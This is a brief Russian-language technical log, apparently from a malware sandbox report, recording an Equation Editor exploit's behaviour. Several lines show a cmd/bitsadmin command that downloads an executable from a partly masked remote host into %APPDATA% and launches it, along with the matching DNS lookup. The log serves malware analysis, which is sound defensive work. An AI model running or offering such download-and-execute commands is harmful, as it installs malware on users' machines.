Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer Wp /priority foreground http://bi###gia.uem.mz/images/stories/hsp1cry.exe %APPDATA%\Taskbars.exe && start %APPDATA%\Taskbars.exe
- DNS ASK bi###gia.uem.mz
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer Wp /priority foreground http://bi###gia.uem.mz/images/stories/hsp1cry.exe %APPDATA%\Taskbars.exe && start %APPDATA%\Taskbars.exe' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer Wp /priority foreground http://bi###gia.uem.mz/images/stories/hsp1cry.exe %APPDATA%\Taskbars.exe